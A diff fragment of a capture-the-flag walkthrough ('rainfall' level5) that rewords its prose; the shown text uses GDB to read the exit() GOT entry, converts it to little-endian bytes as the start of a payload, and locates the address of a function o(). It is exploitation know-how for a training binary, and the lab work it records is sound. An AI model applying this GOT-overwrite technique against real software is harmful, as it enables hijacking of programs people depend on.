AdrianVarnier/rainfall/level5/walkthrough.md

 End of assembler dump.
 ```

 We can see that the first step consists in jumping to an address.
-If we investigate this address with the `x` option in GDB, here is what we get:
+The `x` option in gdb allows us to view the memory content at a specified address or a variable name.
+If we investigate this address, this is what we get:
 ```Shell
 (gdb) x 0x8049838
 0x8049838 <exit@got.plt>:       0x080483d6
 ```
-Therefore the jump was indeed done to the address of `exit()`, which converted to Little Endian is: `\x38\x98\x04\x08`.
+Therefore the jump was indeed done to the address of `exit()`, which converted to little endian is: `\x38\x98\x04\x08`.
 This will be the first part of our payload, as it will sit at the start of our buffer.

-Now let's get the address of `o()`.
-The x option in gdb allow us to view the memory content at a specified address or a variable name:
+Now let's get the address of `o()`:
 ```Shell
 (gdb) x o
 0x80484a4 <o>:  0x83e58955